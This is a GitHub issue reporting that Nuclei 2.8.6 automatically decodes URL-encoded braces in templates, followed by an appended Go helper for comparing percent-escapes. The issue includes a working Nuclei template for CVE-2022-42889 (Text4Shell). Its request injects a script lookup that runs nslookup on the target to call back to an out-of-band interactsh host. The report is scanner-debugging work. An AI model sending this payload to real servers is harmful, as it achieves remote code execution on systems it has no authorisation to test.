2.8.6 decoded automatically #3167

Closed
f0ng opened this issue Jan 8, 2023 · 0 comments · Fixed by #3211
Labels
Priority: High (After critical issues are fixed, these should be dealt with before any further issues.)
Status: Completed (Nothing further to be done with this issue. Awaiting to be closed.)
Type: Bug (Inconsistencies or issues which will cause an issue or problem for users or implementors.)

f0ng commented Jan 8, 2023

Nuclei version:

2.8.6

Current Behavior:

In 2.8.6, the %7b%7d in the YAML file will be decoded automatically.

Expected Behavior:

The %7b%7d in the YAML file will not be decoded automatically.

Steps To Reproduce:

For example, CVE-2022-42889.
The Docker repo: https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
My YAML file:

```yaml
id: CVE-2022-42889

info:
  name: Apache Text4shell
  author: f0ng
  severity: critical

requests:
  - raw:
      - |
        GET /text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d HTTP/1.1
        Host: {{Hostname}}

    # unsafe: true
    stop-at-first-match: true
    # matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
          - '{{Host}}.{{Port}}'
```

In 2.8.5, it works normally.

But in 2.8.6, there is an error.

With the same YAML file, in the different versions, the %7b and %7d are different.

Anything else:

f0ng added the Type: Bug label Jan 8, 2023
ehsandeep added the Priority: High label Jan 9, 2023
tarunKoyalwar self-assigned this Jan 9, 2023
tarunKoyalwar linked a pull request Jan 17, 2023 that will close this issue
ehsandeep added the Status: Completed label Jan 24, 2023
ehsandeep added this to the nuclei v2.8.8 milestone Jan 24, 2023
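
A way to check for the behaviour reported in this issue, added here as an example (it is not code from the Nuclei project or from the reporter): compare the request target as written in a template with the target captured on the wire, and classify each `%XX` escape as preserved, case-changed or decoded. `EscapeChange`, `CompareEscapes` and the strings in `main` are hypothetical names and constructed sample data.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strings"
)

// EscapeChange is one %XX escape from the template and what the wire copy shows for it.
type EscapeChange struct {
	Offset         int    // byte offset in the template's request target
	Escape, Status string // e.g. "%7b"; "preserved", "recased" or "decoded"
}

// CompareEscapes walks both request targets in parallel and classifies every percent-escape.
func CompareEscapes(tmpl, sent string) ([]EscapeChange, error) {
	var out []EscapeChange
	i, j := 0, 0
	for i < len(tmpl) && j < len(sent) {
		if tmpl[i] == '%' && i+2 < len(tmpl) {
			if b, err := hex.DecodeString(tmpl[i+1 : i+3]); err == nil {
				esc, status, n := tmpl[i:i+3], "preserved", 3
				switch {
				case strings.HasPrefix(sent[j:], esc): // byte-for-byte identical
				case j+3 <= len(sent) && strings.EqualFold(sent[j:j+3], esc):
					status = "recased" // same escape, hex digits in a different case
				case sent[j] == b[0]: // literal byte where the escape was
					status, n = "decoded", 1
				default:
					return out, fmt.Errorf("targets diverge at template offset %d", i)
				}
				out = append(out, EscapeChange{i, esc, status})
				i, j = i+3, j+n
				continue
			}
		}
		if tmpl[i] != sent[j] {
			return out, fmt.Errorf("targets diverge at template offset %d", i)
		}
		i, j = i+1, j+1
	}
	if i != len(tmpl) || j != len(sent) {
		return out, fmt.Errorf("targets differ in length after offset %d", i)
	}
	return out, nil
}

func main() {
	fmt.Println(CompareEscapes("/search=$%7bx%7d", "/search=${x}")) // constructed pair
}
```

Run it against the request line from the template (after variable substitution) and the one seen in a proxy or packet capture for each Nuclei version under test.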